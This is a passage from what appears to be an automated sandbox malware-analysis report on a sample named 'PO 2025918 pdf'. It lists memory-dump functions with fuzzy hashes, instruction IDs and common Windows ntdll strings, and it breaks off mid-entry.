                                                                                • Opcode ID: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
                                                                                • Instruction ID: fbeb6e38e0f15ba1485f91c0f5dd7b6aab7dbfd053700c4e38834fbb000bb550
                                                                                • Opcode Fuzzy Hash: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
                                                                                • Instruction Fuzzy Hash: 58900225212400030105B95C0B08507008A97D5351355C121F5015A50DD62189615221
                                                                                Function 016D2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
                                                                                • Instruction ID: 701465d613ce9c61df5ae903ff70ee9e306711b72378145b538d3bc9442f934d
                                                                                • Opcode Fuzzy Hash: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
                                                                                • Instruction Fuzzy Hash: B69002A1202540924500B65C8808B0B454997E0201B55C116E5054A60DC52589519235
                                                                                Function 016D2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
                                                                                • Instruction ID: 486a48874a061be682f80485b46ce9e1ea673ed063d4ed8d84277817219d411a
                                                                                • Opcode Fuzzy Hash: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
                                                                                • Instruction Fuzzy Hash: C790022130240003D140755C581C6074049E7E1301F55D111E4414A54DD91589565322
                                                                                Function 016D2D00 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
                                                                                • Instruction ID: d6db4e49971f0015f753f2fa5e2880271e61bb6bce6948ddd62a7fe9c952ab98
                                                                                • Opcode Fuzzy Hash: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
                                                                                • Instruction Fuzzy Hash: 9190022120644442D100795C580CA07004997D0205F55D111A5064A95EC6358951A231
                                                                                Function 016D2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
                                                                                • Instruction ID: ce7f9a152cea4fc617bb2d5185193958331a3c5bc099e764255080d609a79892
                                                                                • Opcode Fuzzy Hash: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
                                                                                • Instruction Fuzzy Hash: 2590022921340002D180755C580C60B004997D1202F95D515A4015A58DC91589695321
                                                                                Function 016D2DD0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
                                                                                • Instruction ID: 418ae42a3089299a258ac27baf409d198cb57903cb854c0114405629dfbc5d13
                                                                                • Opcode Fuzzy Hash: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
                                                                                • Instruction Fuzzy Hash: DB900221243441525545B55C4808507404AA7E0241795C112A5414E50DC5269956D721
                                                                                Function 016D2DB0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
                                                                                • Instruction ID: c2d4875835202249071c6a66e61a2878d8394771e725bca2dd2aa50459ae8cc3
                                                                                • Opcode Fuzzy Hash: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
                                                                                • Instruction Fuzzy Hash: B690023124240402D141755C4808607004DA7D0241F95C112A4424A54FC6558B56AB61
                                                                                Function 016D2C60 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                                                • Instruction ID: 15aab3dfc6eb210d79a611325900e5cd1e88454b55911327b49d8e5d947796ae
                                                                                • Opcode Fuzzy Hash: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                                                • Instruction Fuzzy Hash: 5390023120240842D100755C4808B47004997E0301F55C116A4124B54EC615C9517621
                                                                                Function 016D2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
                                                                                • Instruction ID: 0cbb256049feda6ee57826decaae356b8c4ba4b9cca100548cf436e926352f7a
                                                                                • Opcode Fuzzy Hash: 55595206b0649f4790657c5c5774f745633cb44aa01326f8a473034714d60f64
                                                                                • Instruction Fuzzy Hash: E090023120240403D100755C590C707004997D0201F55D511A4424A58ED65689516221
                                                                                Function 016D2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
                                                                                • Instruction ID: f704e51f2afb24ec5544675b4a581932c02d94c67a0bb58546025a2d23608f54
                                                                                • Opcode Fuzzy Hash: 84df24cac2e7d29224d3a14f7ef3a782d04ca038bace5624c338776364492f08
                                                                                • Instruction Fuzzy Hash: E990022160640402D140755C581C707005997D0201F55D111A4024A54EC6598B5567A1
                                                                                Function 016D2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
                                                                                • Instruction ID: b869a1ab81f0159d3bc93521e73188a656c628a9c7296d392623c7fcea6c0567
                                                                                • Opcode Fuzzy Hash: cb5c4f87f0557e3b8cbba655bf335e612aa16621cc4455f2c41c5335f078c770
                                                                                • Instruction Fuzzy Hash: 0690023120240402D100799C580C647004997E0301F55D111A9024A55FC66589916231
                                                                                Function 016D2F60 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
                                                                                • Instruction ID: ea9a54c076c2736ed19a7cb4ccd9eb3caf8d221ffc09f17832a377a2f9085e0d
                                                                                • Opcode Fuzzy Hash: d42ef9aac62eb017d5997ed372fda4345b7f09cab7e3dc03a7838083668e8b2f
                                                                                • Instruction Fuzzy Hash: 1C90026121240042D104755C4808707008997E1201F55C112A6154A54DC5298D615225
                                                                                Function 016D2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
                                                                                • Instruction ID: 894fb6dcd607ecbc9c3c32ff19d910e98946b7c5981f91292ffd82e02673c878
                                                                                • Opcode Fuzzy Hash: 2530e939302d9fd051c47d8e930df695ebf47f879de73625fbd268752f79ecee
                                                                                • Instruction Fuzzy Hash: 9190026134240442D100755C4818B070049D7E1301F55C115E5064A54EC619CD526226
                                                                                Function 016D2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
                                                                                • Instruction ID: 900fd6575e1e75818f0791e95d4b5c32515afb8c8203a722667dcf976d8474a8
                                                                                • Opcode Fuzzy Hash: 3543112da6bfae4f6f66d41d655e33e9f5c7ed4edd5f43d96dd0cc0c7ba0308b
                                                                                • Instruction Fuzzy Hash: 26900221212C0042D200796C4C18B07004997D0303F55C215A4154A54DC91589615621
                                                                                Function 016D2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
                                                                                • Instruction ID: 648bb8252994846ce491aec10fda6e9a317f47828dcfb7b96a03b2446a43f20f
                                                                                • Opcode Fuzzy Hash: 23dc9fd0a8caacae10cdbd5a3e2da546417696d574da966b1d8cf7e98fc84a3f
                                                                                • Instruction Fuzzy Hash: 2490023120280402D100755C4C0C747004997D0302F55C111A9164A55FC665C9916631
                                                                                Function 016D2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
                                                                                • Instruction ID: 032bc80fc6fa715cf7073b431599936399b43ccdea7155d039d0274f888f9db8
                                                                                • Opcode Fuzzy Hash: 89f1a4405f72e291a89a7dafb9004d2662c3b86bf44f96945a61ed08fdb4f16e
                                                                                • Instruction Fuzzy Hash: 46900221602400424140756C8C489074049BBE1211755C221A4998A50EC55989655765
                                                                                Function 016D2F90 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
                                                                                • Instruction ID: b5b4ae7d2cbc1f6114c3a5438c225eb048d3008c4537e38c9c71ad3a7c85bc2e
                                                                                • Opcode Fuzzy Hash: 0650588a588db1002619b38651c36776b399351fd4cdc2b6fa38468738038dcb
                                                                                • Instruction Fuzzy Hash: 7190023120280402D100755C4C1870B004997D0302F55C111A5164A55EC62589516671
                                                                                Function 016D2E30 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
                                                                                • Instruction ID: 647220fea09f81b03be9b0750c41e3fe8ae09ebd120804047654dcc217af34bb
                                                                                • Opcode Fuzzy Hash: 9f71a80defbf88f29a3dc48191cd392992757525c9aba9bab79df47437def5d0
                                                                                • Instruction Fuzzy Hash: 4690022130240402D102755C4818607004DD7D1345F95C112E5424A55EC6258A53A232
                                                                                Function 016D2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
                                                                                • Instruction ID: 73d9b1a9abc0de124fff56b5e22687d51ae209ce7fc866932e9cd977816fe1cb
                                                                                • Opcode Fuzzy Hash: a804f8c89b793c2a9a64b755f824a0d3210f7035dfd518fbda72560cce463192
                                                                                • Instruction Fuzzy Hash: 1490026120280403D140795C4C08607004997D0302F55C111A6064A55FCA298D516235
                                                                                Function 016D2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
                                                                                • Instruction ID: 03d078a4c6a0c86822d3fef07523c463c000270fd9f2fe8087c0e946f4b3ec36
                                                                                • Opcode Fuzzy Hash: bf8668be4a279b30cd6ecd605d2e3dc122e7712b15152121aa696e2de47c5634
                                                                                • Instruction Fuzzy Hash: 7590027120240402D140755C4808747004997D0301F55C111A9064A54FC6598ED56765
                                                                                Function 016D2E80 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
                                                                                • Instruction ID: 08d7d9b25f7e0e8903b82d98c4785996383126a72bce5afa846d8425b377df2e
                                                                                • Opcode Fuzzy Hash: e3d49fd3ab94f20b9436bbb5624fcca112c583c843724aa3af3d7a6e8c11b5f2
                                                                                • Instruction Fuzzy Hash: 7990022160240502D101755C4808617004E97D0241F95C122A5024A55FCA258A92A231
                                                                                Function 016D3010 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
                                                                                • Instruction ID: abda881e26f87180bd3075001964406442059f563fab1e071ff1154d29ad5777
                                                                                • Opcode Fuzzy Hash: 7e6f732da4fa97c60693a8f9ff833ce2f8fb606613137d038bd49986d9911985
                                                                                • Instruction Fuzzy Hash: 1A90022120284442D140765C4C08B0F414997E1202F95C119A8156A54DC91589555721
                                                                                Function 016D3090 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
                                                                                • Instruction ID: e7455696b937326ffb042207b8b1d10aa8f978fac1d165261194e7d6175c8ea8
                                                                                • Opcode Fuzzy Hash: 0b14a73f97374571b0f1897f2c5824d982384138a91c468bfb58d6d163e51593
                                                                                • Instruction Fuzzy Hash: 0D90022124240802D140755C8818707004AD7D0601F55C111A4024A54EC6168A6567B1
                                                                                Function 016D39B0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73e12e5ad9699eedcfb088b9db93c3f4de55bae099972f300ebeddea60c39cca
                                                                                • Instruction ID: 3460fb6c8b25ad5ac81b6f9e78c528e8ec355e4ec7ca9872febedda09ccb6ac1
                                                                                • Opcode Fuzzy Hash: 73e12e5ad9699eedcfb088b9db93c3f4de55bae099972f300ebeddea60c39cca
                                                                                • Instruction Fuzzy Hash: 2A90022124645102D150755C48086174049B7E0201F55C121A4814A94EC55589556321
                                                                                Function 016D3D70 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5342170ea9e2aa259bd4b8ef8eea89b2acbb8d3241fcf6ed314ebf0822712293
                                                                                • Instruction ID: 8e594a7eab151b52a3446de99748328de2428a7f017775ed50916df994a6d803
                                                                                • Opcode Fuzzy Hash: 5342170ea9e2aa259bd4b8ef8eea89b2acbb8d3241fcf6ed314ebf0822712293
                                                                                • Instruction Fuzzy Hash: F790023520240402D510755C5C08647008A97D0301F55D511A4424A58EC65489A1A221
                                                                                Function 016D3D10 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f02340d9bc93501fa9435021984d4b6307dfa971bf95222abb457039ee034ced
                                                                                • Instruction ID: 1476b6714a0eeca650cedcde0bb6f56927ce0772fce1697301096b440ee04ca9
                                                                                • Opcode Fuzzy Hash: f02340d9bc93501fa9435021984d4b6307dfa971bf95222abb457039ee034ced
                                                                                • Instruction Fuzzy Hash: D1900231203401429540765C5C08A4F414997E1302B95D515A4015A54DC91489615321
                                                                                Function 0040AD20 Relevance: .0, Instructions: 3COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_PO 2025918 pdf.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b321c98d22beb57292bd23e2afca9873836200869944c03403241b01ebef6b2e
                                                                                • Instruction ID: c08db954ce700782ac5ec97d103e544f6dd908508358fbafc631fab0ef8ddf2f
                                                                                • Opcode Fuzzy Hash: b321c98d22beb57292bd23e2afca9873836200869944c03403241b01ebef6b2e
                                                                                • Instruction Fuzzy Hash: 9BA00271408604DAF6194AA0C105068F3F1AE1130AF2004AED891574509B3A1432DB47
                                                                                Function 016D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                • Instruction ID: 6f6ad15721a741acbce91f24dcc87f3e22b429fe3d4e0ed3ea8c24ce9bbeb85f
                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 016D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                                                • Instruction ID: 90acc863a166885aa9b7aab1e1fd5793e7d51a71814bb781c1cad1934677c31c
                                                                                • Opcode Fuzzy Hash: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                                                • Instruction Fuzzy Hash: 9D51D4A6E04216AECB21DB9DCCA097EFBF8BB48240B10826DE565D7641D374DE5487E0
                                                                                Function 01742410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: ecd555176242f96421d4d6c2f50233fb40f5b72c8e58ee84807cbbfd9d891527
                                                                                • Instruction ID: 186bf3990e90f4a60354489d518564dffced88ba61adb237198e16ac71c5c52d
                                                                                • Opcode Fuzzy Hash: ecd555176242f96421d4d6c2f50233fb40f5b72c8e58ee84807cbbfd9d891527
                                                                                • Instruction Fuzzy Hash: E551E375A00646ABCB20DE9CDD9097FFBF9EF44200B148499F596C7642EBB4DA1087A0
                                                                                Function 016C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01704655
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01704787
                                                                                • ExecuteOptions, xrefs: 017046A0
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01704725
                                                                                • Execute=1, xrefs: 01704713
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017046FC
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01704742
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                • Opcode ID: 7f69fdd3a1874b7762595c71e60453e17a229bb68cfab1aaf22034ebbf1ebe19
                                                                                • Instruction ID: 248d913d81470bb8f0a787eb584cd23d466d2da2b7128adc9210b6d8c958827e
